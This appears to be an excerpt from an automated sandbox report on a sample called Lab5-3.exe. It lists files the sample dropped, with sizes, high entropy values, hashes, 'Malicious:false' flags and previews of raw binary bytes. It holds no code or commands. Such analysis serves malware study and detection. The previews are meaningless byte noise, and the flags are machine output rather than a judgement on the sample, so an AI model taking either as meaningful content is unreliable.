                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tsKzRh0JkgXC8+wDb/UrK3ekjChHfUTid3hBaUoSGFcmeykEdEElU92i:tsKzRhO+sb/UrKu8CiGx0uKeY2ElUJ
                                                                                                          MD5:11E67064E80F7797CF981870324F668A
                                                                                                          SHA1:9B1CAF70CF95504EEBD36BBB055F802BB6C17F28
                                                                                                          SHA-256:8748FA3F6CA27473D1BD0F5E7F5C69697CBE25A4A57A7A9E5F96FA02ECA71C04
                                                                                                          SHA-512:952948BB834C45ACC5B38073D2C0F4CB51E686143DE8EF91F36E9E059B79ABD0A733FEDBE061B8F80D2236CA9CBFC71CF02E44D05077B34EA9550DE49A55983E
                                                                                                          Malicious:false
                                                                                                          Preview:..._......kRQ...E.j.^...0..2H..tg....H...v...v..R.O..h.n..#T:e..A:.p.6v'....a.;i.....!.[:...Z.u.......b..e. .ju....7..,z...wt..FBpT..h.....6...li....v_.w(..p.b.kL...csu.L.........:I...-...X?_..&...6.Q.hcB../.P`.".......,N..\...$....=b2.EIU|9.......r8Z..-...o..g,4..Z.LJggq....g....6.c.....6...H.v....-y...U.$F.O....wT..X..Z^....j..;O).....v..........aAV...q.rFe.9.(....M..C..^..Vv.(....T.........-.s..T......{.hp.<..}..M...G.....=_QS...X.....s0...y2O...[e.3.^.......s.q........YHM%A........2....[b........=6y.G./...(jAa..../....d....D4..u.,`j....e.(....h.........A...`....S/`;K...>........x..=....nQgex8|.EuJ4...=...9P$..r.....+.A..&.(..h|..y8V. ..-.......4.........-\t....XH...N...".PLR..]....B.....)..%.%;...<)x-q..E.H7.\R..&.._.g.e.e.X_.:5..Ox=...p...Fo.|......B.M.$.f?0.....|..J..*....k...*...RF.D.0..nZ..q(..H.[!.cn$....Cp....Y.d...........;...A.....D..)..e..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.92508276470325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TWe2zioYCpvs90m/E4f4HfUTid3hBaUoSGFcmeykEdEElU92i:d2XYWy0AV3Gx0uKeY2ElUJ
                                                                                                          MD5:7F4A1FA4C55DCCEAA078DE4FB5EDBBC4
                                                                                                          SHA1:44AD0F90F4F695996E190FBA0CAAE64BB398DEE0
                                                                                                          SHA-256:7B322AD8F648F823D8959D1B486B46CC0AC104F245B91AD74E0E2AFC9378A770
                                                                                                          SHA-512:F50C882A2B78E4D1E22B3B58D0C31FE80CD653855ACF4209E5D18CEBB43FDD3403FE3E5145430D30BFE2F7E370C303935A0BBCCA1B22E8E611F84947DB222377
                                                                                                          Malicious:false
                                                                                                          Preview:.l.d...B.....w[.Z...=.s}$..0.........R.V........I=.wm...IV..?.....3(..c..[|."r.q.9x.H.'q..C.`.Q..f..k..l.I....Y.....Kh...Bb..3=...E.,..#(&.m.s.........[..tB.k.....f..*.'......V.?E~.].X..:.s^....ES._{.;.4.....*.A.4....[l.p9\.oIV.R..Y......P.b;.,w(Ze>../{..G....Z..3bO....@..zJAe.7).`.....T..3w...Jn.6..T..$..2.....C...C..L\-...[..[..p.;..f..jk.P~ ....>-?j..T.nw..9<.|....a..........M...:...o......Hs..."J..&.7.>..y{..U...M,.B[.P.n.O..]B.j.68....7h./.g.M>.....0q...~.....Q./.)2.>...1...|:|..g.Kv..#.iVE..c/A5.T.OB.KC.G8=#..Eq..@.a2....YJSv....@;~..0...,?Z.wQ.q.@.c.u&...P.8tP.?..zP}z.R].>.2..E..k.. .....7..M.`...F.%..@.E/.F..i$I......@:>t;L<'.\..?i.iV.\....5...+AlH.^.....ex..C.7..&[Fj71.."s...vl!.i...&!..*.....E...K...:.k.y)0.....qlz.BhiL..{....R...A...^m;#....L T...._..K..U)R..N....S..:..4.....<Uq.d..Z.2.X......3/.....Mw..q.5m..$.C.j9.Dd.Ne......V.-........rA...%..a^...G...@1D.Ok_....^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.924007059727688
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fSIoQUy3JTMcv3BKwWnHfUTid3hBaUoSGFcmeykEdEElU92i:fVoQjgyxFGx0uKeY2ElUJ
                                                                                                          MD5:749B780ABD2514E082472F6EE1BE4821
                                                                                                          SHA1:3E3E645441283A8CF1AF59BBA3543B6D775B135C
                                                                                                          SHA-256:ACC3BDEF50035270D736FD209951520900A11ACCD01A00FC39C7F0AC8BECF85A
                                                                                                          SHA-512:05B7D5E5ECB59E9EA3901045DFD1289053DF0A793E5B34667EA92D541378A1D36DC9D5A8A79008F70931302A3B383965A2A5C1A0D5D6089F3F0CEA66C65A5592
                                                                                                          Malicious:false
                                                                                                          Preview:.4.Q\.*......A1.AX.`.J.G.n...g...N2e...Q..|e..Fo..P...o.%...x..l.R.0g.B...A.2...8..!@T..k5s~H..z/.7..K.4..q.c.UX~.N...3...HqIf...!.@.}0.4....*..'...4.+.......oxS.b.G.'...../]%o....`.^.....MT..P..j...m..7.].@....... ...<.k.1C...RR...>FP.....o..(....K4.h.MD...(..GG.W.L.,Ou._..Y?.Y..+~./?...q...9..;..$..;.....a..;Y......G...."#E..4l..=rW..w.B....N.r.?#...V....&.F..y......"FS...V.9*J..z.....!.>o+.&j^.5.F...@.G....\..YM..!.b.~5......./..O..]...)...l'..aCaQ`.....K...x..?.X.B....-.S^j.?..KkG..v..v....kd.r....K.g.?..7..2.6.I...U-..i.P....8.T.O..........vQn!.....y*t.f.........."..z.b..4#~..6a.zKv..:.H.m..6.....7)?eN.TGo8..`u.Q....H.7b.5.G......&.../.+%...w\...j*R...m.h.&......./..-r.h!1....S?^'.|=Vf.#A.|..r.!B..DZ.0.*.`<\y......S.."....'U.e....I&;f.Vl..L...{.....oLT...jz....DB.s.7..t..R.lJ9.K.l0.!....`.N.zv....zK.....H..W.q..t....%RK...J....._?...9..G.f......4:-O..!...........hP.c..&......g...).N.C.......E...K...5.gC...|b.l.8.YFl..a.M.......R..\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.912124296688313
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tt87U00UD4W7nVd7V1KHhHfUTid3hBaUoSGFcmeykEdEElU92i:3mffH1KCGx0uKeY2ElUJ
                                                                                                          MD5:001A7E50ED14A3D4AB5A3BEB1019127A
                                                                                                          SHA1:8A90C4F185F60D8E22F84EE8F0DD2ACC1F5270AD
                                                                                                          SHA-256:D5292D39C3708D4C8826534E25872A984525D5A76F80ED2E82F4CC35B7710AD2
                                                                                                          SHA-512:44E6A765C8CEAA7D0884CB335AE24D6CBCAC697D57759D6B5192D1CF98E9A9AAA2647A750F69B7E8F6BD9F52A0350397E6888BF4604746042C7E47749A29C1C7
                                                                                                          Malicious:false
                                                                                                          Preview:.'`o.BL..#k.T.e.8..]O+..3.s.x....L...;N.......=8."..U.<Y$'..&^.....`...Q......z.$...P<..?...t.]......96.HM..........{...e.Wk...B...nm..A...%...g....j.X9..T.Q.D.I.D.6.8.......^....C.(.e&?\j....?.:.'LyC...:./..o.. ..hO?z.;.v.Nn.,$NZ....`........ ..w.Ip...r.........0$.Y.2{.....-..#\.b*j.4.]300,.}.Q.r.B.-..G.P7x.S.m<Q.8...q....yl.!w5D.33d..)G.p...r!....q....H9f..9....6.]......:.Et'."y...qt4.`.d..v.c.T#&.lK.....c.y..n.,.W.c........%.........Vg...u....!.RG-(.c./NM../c..+q........!e..... !|.]*6^.....g._.j.e.g[k%...=...tD.L>...x.H..l.N:..[i...z!.....l.F/J..-5..xi..na..M..G8.f.#C[pC.....f.....G^?..1.r.....z....%M.`..C-.k7..ki...@....~......9.?..+..c2. ..i..C.I?....^......-..4HA....Ar..q.r.._...W..3.H.Hm..?..0.\}....~.}....Q.y.....}.FC..xR...'I.]z...1BW..x>B....+..U.... Y..m...k.....-..}.|[........L.;.-..Oy^t..!..c.ZPJ<.n....8p..Q..R..i../.M#3..:.Fz.......`wXP.R.8..=3K"..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.908677562094857
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jWFy0sCcnvMiCShHfUTid3hBaUoSGFcmeykEdEElU92i:jWxmvMiCSiGx0uKeY2ElUJ
                                                                                                          MD5:B136D8E5BE82B7E08FB11F616ADFB2F8
                                                                                                          SHA1:FB68BAC3377DD41C218A3235B480DA53AA113EA0
                                                                                                          SHA-256:C2B9C2A96391338BD31B98C7DD2D34D818E42B53C70A01AAC954E964F3E5A11B
                                                                                                          SHA-512:DB672617CC315726269806DB08235D9A0D0A8A589720AAD1AF640B740431AB2C5A7B3521FD9C22B78C862460AF2B48ADEE0ABDB65F599FA20774F29ECDDFB9C3
                                                                                                          Malicious:false
                                                                                                          Preview:../-O.s.... .../...[......?..."....6.....'7QC.?...~.>.......7....8...U;.0N.M....K.;........,.....-..`.S...U...b.5$.I|.H.......=.6_....V.....`O.v./,.BPV.2..Q...3*....f..F4.*..wMT..q...,B......p.Jy....M!d.....`{....[.[49..9,M.@.C....$....7w.J....5....r.....DW...O.F.!....":.g_.\:+#.P.E..S......t..$8T\.P=.n......[;.v....w..~.F.l!...q..T2..."....?W.D..L...,.8.+...?.:.n.....'9...3b...Z...j.5....y)RY.F.<.....tbajbS|....e%R..o...D..B.0.`.`.7P...s_.fl5.-.r^.*..........j..W..i:'.$..J.h....G?!....s...C.G....c!...$KP..3_.....I..,U.P.Yft..L.H.].......52.....v.:......#A....I.x....@....b.h.S-..S.Oa..`..U..[&,V.6.p.....Ci....s;...+..R=B.Y.y.HG;,.iI.,"K........8(A....,..*..|..u..|.j.."t.H.X<...i.....C.?.....+..5.(..(.P.gN.,(3....cY....k.X.....:t...Kzl..C1(...2...j<b......X..2..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.917756789572078
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3ClTJGzK++lWTK04tHfUTid3hBaUoSGFcmeykEdEElU92i:3aFMBwWT14GGx0uKeY2ElUJ
                                                                                                          MD5:C258F5F558803B9D57C8890F50544B22
                                                                                                          SHA1:047088E1D2718CB19F7BA4C25BDBD5AD8AC16B06
                                                                                                          SHA-256:72A03E667D926330E1CA472C38C7D41D77E85703C9A458F02D2B948FDBC6FBAA
                                                                                                          SHA-512:31BC486A0059F485BFC51A9D723FE2D811225884C5A0157EA494F4054B078B8B2FBCE6AEDB9B763C0CEF9A27DE5E308351A78457D02BB2954EB1A9156A506C07
                                                                                                          Malicious:false
                                                                                                          Preview:.V. ......z...mK.e....-..D...?.....2.........+o.........".-G.VG9..^uBy/..*A.E..z.t..ZO9/..]tc].f%...m.7.m...gD...`.U*.7...E..E*.Rp..N.....[..."1....a@..#.......w..g.ftx..+..m|1_..l..#...I.+,B.Os..U..\.~.m.&....Ut.r.>B..$.Y..p?r...._.&i.4....MU#.OzG.:k...,.$....~U........~..i.....s.......*>.Q.....1q...f..z...z..{O.@..m..|.'C.D.<."..k(...m..U...mK.....Y..9f..>...:.w.y.~..1<.y*Iv.3.......Z.lUU...i...........O.GY...}T..x[.........R4......L.6.[....!.....?.0L..KR.<......+EN.A..m%y. ..%...=.....C.xz'h...#]....r.....y.{R5.+I.v....."V.....@{...g..]...w........Ca..n......PK.j.]..Y.....D`.1........|....C...] ....E.......z..d.....5...#e:.1..M.7..$....a.]......."o.L...X....q........%.9.....i..e:v..M...,.y......q....8{...@h.;.:.i..0....L..."..\.1Q...:.....W....>i..>....x.g.g...e..Y...z>..(..4Y.l7M@D......F. .s..f..R].o....S4C..;",.g(.+....Mp.Z'...J.........o.D.Z.p..o.M..4.[$g...{....@G....].a]jm...)..#...4...|t...^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.919334575499943
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LgTtaZ9Z/Z2u+4cfgBvY0Xb31jHfUTid3hBaUoSGFcmeykEdEElU92i:L/Z/gu+ZfCr3iGx0uKeY2ElUJ
                                                                                                          MD5:6A256ACDBB376A268E9DFE4494F91129
                                                                                                          SHA1:C1B0EF24B8FA4899B6B41A3B2FDCE5886D2EB56C
                                                                                                          SHA-256:628EC74BC2134126A6A460B703E1E35701FB3AE23B2FF0CD054C2DFA6E8A248A
                                                                                                          SHA-512:7A1346547F083EE0736D51E12BF5E3322FCDF605D5D424FEE34E5FB7693E57D7C88015E3D8B978A4DC980BE431F29AD499B808B41B300D55373FFEB7F0F9784A
                                                                                                          Malicious:false
                                                                                                          Preview:..}.tL".T.. n.O.\WQb......a.%[..Z..-......K..g9.x.*i:NZO..Y......q....+J..n..._.(.Y...|L ...)...w.Vg.$xi..x@j..Hr.7...q.Q.......D..:.O`3..v...z.....$...?g....\.?q.....^..1..^..".S.|..Z....e..V.V..g[..+.\.Lt..E.a.Y.!{.m.......Y..%7.T.q...Ww.....xfd..Y"n...". ,>..K..,|(.&k..;.I.2i...LX.8.}.8t.mX..;H.N...9...YT..[LA...\m\..0l.d..B7..W.(.dC 4.<{.[ .._j.....4.]bCK..{.X3..f..!`C.?6.......y.........K\..@D....5..i/..b...........He...r..U.Vr......|*N...B...v.6cr..Cu7:>...W5...9....'".K .!..a8.....'.....K.):=~F..^Wr..}c..$i'..p.\.kv..\..tuO.}.........2...L..)h.Id..}..i..s."g]..|........49..>.|3...N.=.DR.F".E:....EWdV0.Q.i...........7.%qN.m....../O...W..~.R~w.;..E..{%.J..Lx8..j%7o-.s.+a..@....7q."h..=_r.L..X.S.q8.." \..U#...A.....|\.ZyN.0.,.R..Z.....j....%.)..9\W.....N&.>..-.kw.#.{.p.h.|.L.!..`.;<....!..,..".E.}. ..T..._B..P..R._.r.ji....u3..V..S...e.V...H.J,...@...O.-....d.[....*(.t.L*.f..........H..e...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.918005443078975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wPrjhWqkpnX0mACrTTuIUUjeSHfUTid3hBaUoSGFcmeykEdEElU92i:KjpkpPJTBCNGx0uKeY2ElUJ
                                                                                                          MD5:64B5DF478FD45B9EB0E522C722B82A25
                                                                                                          SHA1:0AC6498525F8D655D7CFEC8121F7A37F76D72AF2
                                                                                                          SHA-256:FB2302ABDB4755A8051148579ADF3F2329C0099CF8758D22B72CC760994B9BE5
                                                                                                          SHA-512:CF1FC474D46EE656BF31C5FB6D9159CF617BD4E6851A518D5954166C3D0EA7DB40201B21E075811B65A857036564A2EAA3AC575EA0052D52D6C3387F29695048
                                                                                                          Malicious:false
                                                                                                          Preview:..u5...R.......YE.F...#J.z.l6,u.'...S.?..)....>.N.?...'...S\In....\0..6..........kJ.2.E..g2.-..y...Gf..y.E|..F.[FCY..>.~.:..)H.eT......r.<&...)G...j....z..s.o....R....*..m......1V.5"...T.1.f7...Et.f..x?.\..A.(. N....S.@A."...Fm.".....3.j...w^bJ.@2."...c...X.mG+S.............k....AE....o=....r5u.Y.........+.....<.F..,.R4..!.H..:m&Pu.!..^*bg.J...2..k.G.W..#5N.0...+.v;.6...mC....o...w....}.9....@4eX($..d.6N..EV.....,.j.^.z..*A...{}.a.......;@...A.......+.3T...v.RX.s...}KvF.j6..Y...g..:........C.....w3qd;v.uAP.].0Z....69..r.M].f.p}5....]..;(.?6.....$P.V....D..0.)..I.R.s."p!...~.&P.......GS...Hx7..2.H:4r..T.#..Xd?...A3*!7...6.......m......*.......?..o.W..b.a.X...Ug..7i....(..j.H.w........!.0.....sj_.ao"J..{..^....\..t.c.. ...R.GU.m>JVR..m....RR>3.p.jc.S..m.d^..P...Q=...e..}....l..\...w&.../..@]@L.^....,..m.FC.&M.u.=./-}...;.esm .4}..;...@.....ZXjW.z...+........DA<R`nQ*..........G....?..t..^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2320
                                                                                                          Entropy (8bit):7.930004319329593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/yKgpgMw2exEp042HfUTid3hBaUoSGFcmeykEdEElU92i:qKZ2VHGx0uKeY2ElUJ
                                                                                                          MD5:D95AAC6B6224A07C7DF7FD06C1E61D3F
                                                                                                          SHA1:DF3816445077A4D981BCDC94EAE3EE7173E110BC
                                                                                                          SHA-256:E885E2E4505EEDFBA6052195C9363076E209145A7848783B12063ACB46A1D269
                                                                                                          SHA-512:6D8C9A93DE51A3FAF8779FC31942B39025850C70D74B8F4F4144371F0462273432A0CB0D10A4B840A4A8F64B99B13DDE5980850981BC20279944C46F3918ADBD
                                                                                                          Malicious:false
                                                                                                          Preview:MJ...I.L.2.F.q6..^.....J...m.-.......:.(..^...M..x.@4...j/.r.)...{....F...xG~.c....:)...g%X....:....j...D.b.....4.o.....a..Y..%.........C..l...!....tY.9!..U*\.:..dc..7I.K.C...?....UG.....%...gcI..@.m....6.~e..............&$...F...B.1.P$....<:..Z...<.a.8K'TK.d.b7.cC.RV......oS.r....o...g...$..u......`...#z9.m..e"..q.j....s.<.LwB.K..!..+.....b...sg].W..h.....4../..k...e..\D..........1{%...uq8!.O.2.....S.R82..k..[...l4g....J.!;d...a..y..2....K`B.....{.}..W..o.h..wh.]`.3>...1..]...c97.P.u^.$..-./K}}..|..#z..`.7.b........._........_..:-Y....e..z2.....{...t.%....n....#A9@..Y?.w...G.'((....i.[..]...........<\.8&.D?..n...T..t.}......f.bJ...rT..fNm[kv.I?...U.8xV.n.E^..*..%..xa"LlDY(..".....2.)..Ns../dI..q..f.0.D...L.x.z....5.Uz].q.....i..V.g.N..3..h..6<.Q.sb.<...Mn.....k=...p....vL..g....o...(...Cc..|..].......P@4..6.hL.f.iK.(n[0o.!{...8.~..b.....].l.p..$KU..c.0...b..B...v...^iJ..r.A...PPH....v5......I,.O..........==.9.8[.huy..........; .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9213761596782195
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vHWGv32DmqRtsH/UMc0IBHOd5c+MqIHfUTid3hBaUoSGFcmeykEdEElU92i:Pv2KOmU0IM5LGx0uKeY2ElUJ
                                                                                                          MD5:E76DD1BF93C0C3C42AB04435E2F64324
                                                                                                          SHA1:74AEBEFE73666AD01987BB95E5E54B0C14037F03
                                                                                                          SHA-256:1F2B9E7BF9B5D69EAF01C5722AE63FFE7700271DADDDE8FC1EA1DD17FE55ED83
                                                                                                          SHA-512:EBF8762D8896BE08CDA8EA37A6AA11BE96AFD45F5593C6CD1C24DA1E5B18DEA40EB5D1E4B3D08AEB3AFF30E58B9A1F6DE9FD1BDD38887DF65556D8B1110FD837
                                                                                                          Malicious:false
                                                                                                          Preview:Lv....9...Q....RJ.D....p)..V.v.N.........~f~......L.....wtt..Wt.c9....y|...{.s.A..0#o..q..e1x...6.teI/..P...g.....0..t..&..;..<.Fw.....[O....<.yN..W5X......_.7.b...R..OIN..9..A..`.....X.....wq.....F.o.|...4=....4.w..!....}.v..^..].1I.b.I....1...3.....n......Y.b..-.gD....h;Na,.fP...[o>..?%..ED..+.a.bC..@v@.g.m........W..>..U,x..~"...I..8..P..B&._..h0Fm.).=G.O.t/.....^.I.i....r..V.....Gw.........y...?....'x.."|...@W"[.:..V...IM..T..hM'.1..M..~...(....C.Y.H....r.....%.z<...*.....Lk.l^[@.J8.X.2^i........M0qu.]..hH.Z.d..m.8..N...}w.0....Q`.....(..!It1.[n....{.......i...A.i...t.....,csbV..8l....w.Y..>$Nu._j...Q.W.U...Cn...X.%.2..e..!..J..........5..x.x..\{'6.@].$3"..1....=.X......*..c..j..e......Q.t..NS...&.4..&R.wj.PN......x7.....6(v.E.:R........S.-.&&M..e..$)....ko.5tR6.3,.+ ..7.<J.E...Hq:4;.=*nh..Z.y.........=g+.....A.... K..b0..]..o5x........U..$\.u..@..?.?......1.yN=Q".j:+!...}.h.h....h(.|r3.............Yg.......\....{Z;6...d..)/.....(.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.929874984200597
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ndv50S/wLqmOEXEJNHTD3Sz/XhHfUTid3hBaUoSGFcmeykEdEElU92i:NdvGL3yDs/SGx0uKeY2ElUJ
                                                                                                          MD5:B99F5D3433F0B3D0696FAE6ACED061CF
                                                                                                          SHA1:43BC05EBE7A8F4119295F158AE75B9DC5D2EB876
                                                                                                          SHA-256:8F2FF74EB84041CCE4C82EE1F6CA393C6D6723B810DE0B7816B544E59C6B0377
                                                                                                          SHA-512:FFC11884B161D2AC7290AB56E9599040645D06C45F4B638B61F1B3C3E4B625CF55118B92C1545F1C296428553D22A9EE3DC56C54C733AADF7582D89CA484DD67
                                                                                                          Malicious:false
                                                                                                          Preview:.S..AI.7.%4...... .K..f<.11..);7.cPk......m.....-...*.M...Ff.....z.][..[.~..K\..r............$.s.%..=.........;..`.:.O..z.a...|t.qY.."z.x.$..y.>S.`.d.jZ...d..y..U'q.b....Gc....O.!.C@.Q6..g.~.........^!.f...Y.Ib~S.i.p...{.!...L.og.f..G..p.6!.~..7tu`R...Y\'..r./.$........*.5=.+..TUO...F2,9.l.P..d.#.c8.Bb5..7n...t...[.}.Xx..9E-.}m.F".g...5_,...{V.Q.3x....CK..*^MT.......D]..X.h;+w&0..%...q....9..}.~.).]i..J....B^...K..B1h2[m...as............U.7.....O.3o{....Q.....!.*.v.c..bu..J..2$..<.......7(......t....aG]......O'|.&.B..H..[[..;}.Xi.*Y.I..zg.....T.c.2.....X...,40.x9.).....t...........f......w.ud..............{.Y.{.l._U.....-|"M.g.C....QE...[....]...4...@_)m..*.O5/.9.O.Wt.i._!..$"..a..5`...mm..Q~......../*......V.68..x......J........1<I&z.rh.....)Y....,..h.)....HO..h......,D..."r...R...jo/..M..`.J.Z8[.+......h>..X.....mq.f..m...Y.s..5G.B.ec.J.N..@Y.2..x[#.%......tp...P.,..U.t.q..f.1.D.........q&.n...0d.v..Az.5....e!...1,. x..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.934412167018332
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:P5s+jcrpU4hvox6Ohhl2TnHOHfUTid3hBaUoSGFcmeykEdEElU92i:CPrpU4Fox6OhX0BGx0uKeY2ElUJ
                                                                                                          MD5:214E4CE52744A010E8273215DE919BDA
                                                                                                          SHA1:B91EFD537208D8507344A97CE8BBC62F5588A29E
                                                                                                          SHA-256:73D18EDBFED8D09CA5ED98579A83EAA4A4660ED8DE4EEA5ABA6DE02589B8CBB8
                                                                                                          SHA-512:7B7B87B1DB3A5B0D9A0E4BBCF109C46C1CCE55E79906EB0DE780D7AA3D326EAF7D7833DE6B6DC433DEF12BD3AEC4638CC02738AE095264D0B258CCC77931B472
                                                                                                          Malicious:false
                                                                                                          Preview:...<.......!G8..2`...O.....M.Z.>.'..+|.0.2..S]g..n..{..E....P.-e..}....v"b.......{d..&G..J.(1.F.$......1.......|i..Ny.=..D;.........NB......3p..C'A/?.0um...F].^u.,..g9.1..e.X..|*.5..S.c.'u..{Co.l...D.`.s+.....e.x....t'..e.`..!..O.&..t.gY..OQf.....v&<X../....,._....2!...t.|...I.G..G.3...Y?`o4U...M....".X!.%..wN......%.[....k:9i.X..e...|.)o..........1..6....{...6!.=.Ta....;.d.....`...~...x.J;...IO>....,... ..O.Ao.zRb.D+.t.UY..[.K.|...u.[.<.Y.Km....e......weF.mQ?1$...z?$...g.'..f....`...FA.b.;.u.f.#P...*...{N.LR.Lu...4...t.."x.......pJN....,5.z{...K......qJ.oZ..GT.....h.%d..j....7t...<..2n...:.4bPHB9.7.yn..I?.Z?EF..37..D........l..bW..D_.(...a{c..d......r..?..}....6.D.z+.m..q.G.?.Y@Q*......`...#.."IF..h....ye..8...~....N.R\.y.BR.......#Y..:.$.~.u....$....*.8/&.m+.M..d.i.UHT.G........`.1<]V..'..&\..MP....:.q./..U.}|.\.].Q........C..._n/T.,t..A5...wrD.......B[..c.b.G.."J&.].E.l.K..{.4)T..@[...=...Kr-cu%.k..P..g..1.u.$....jh...$Qy..d'}a{.C+.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.9336679244585735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VfPOxI7eFjHWxoFlv56DChUYtG8Ye9hHfUTid3hBaUoSGFcmeykEdEElU92i:FgTB8oTgxb/e0Gx0uKeY2ElUJ
                                                                                                          MD5:741CA89D5275B5D930103CCE40BCBF3D
                                                                                                          SHA1:C41BDBC1AA364806F285EE5400AB725C9F57809D
                                                                                                          SHA-256:90738709447F2865173D186DDC3D47C5AAF184784286A74934309C4080C34DBA
                                                                                                          SHA-512:3FE72D260BC8F73D0414D91B42061BEE1461D59B9371ED7799592645315B596389E35FB453B12072EB0CF63D8C975786D1CEE15FD8688F53100DC9EF3D3D7D0D
                                                                                                          Malicious:false
                                                                                                          Preview:.r+T.d.......t../-.$.....^.X.d.....y.:.........X..{..8..:.$..].........H{..P..J.|.}....~.p......b{.)....U)L.>...$).....(.KDY.^.t.*_.._M.9..L#3.T...^.~.iC+...L..r.<...2...l.g...[B.Y.`w..n.:.i..........S.K..u..L.7\..R..)V.Q.g.#.lqN.B]....g...:n.j%_+.y..s.MH.iu....Zw..m@?K{P.'(?~..?..d..X......>.Q. ..`a...z......k....b...(n4o./L...DQ`.U....{|..e\..@\.9...N.8.R..z.j....."....&....j...J6..-..t8..R.)s..{Z.....-..:8c>..<...KB=.r. ..0}.;.....".%G....6.... .N..:.s.....dg....Q,.....s..<.9.#...d..5.F..B..t.s.i.g........N<...O..Y...h...._.,+%:/.~..w..k.GW/1.E.c..)=_.}..%.XM.=a.......j.?Z}.`..a...M...}.I.`..."..n..x.x.e.....Fu....w.....U.z<...D......W...M@..Uy7(,N........~..Bj..E../i.f!..7..yo..I..n..$R~f!.)~zWu.F....u&].2r..fV....D.LSt..'f.,c%6.C..F.!..[..}u7..]@.._.:..i..H.?...."8.R......MLjp...Li.i.&.Q.kE.~.?.....m...]g.6..LC.x6..A!.#N.....i....W...QK........4.....,...]....E....Y'.%%A.]./.....T..._.h,....;O......{..Wj..z4j...u.z..]Th.....y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.948649115667014
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:c61xzsRH/nXRACf511RijjRaPrrVpOYV/HfUTid3hBaUoSGFcmeykEdEElU92i:91eh/nXqIzUjdazbOYVEGx0uKeY2ElUJ
                                                                                                          MD5:C48FEF2E6515D31DE7B1FC57E1BD3E92
                                                                                                          SHA1:91CDEFC92DEBE47F398F10AC1F0091F379A8C17E
                                                                                                          SHA-256:14FE24AC3BC49BC63ABE396BAF22F2CA47F955CB25332F3AB721D8255DF10EF1
                                                                                                          SHA-512:C25B4DA341CF3901CBB340BBD6E675B4C6577FAE649579AB5595527482EFCD94A9E4F99F568FFB73FB4BBA8EFEDBB36F4AAA7EB63819020E52E58F1F67AA40EB
                                                                                                          Malicious:false
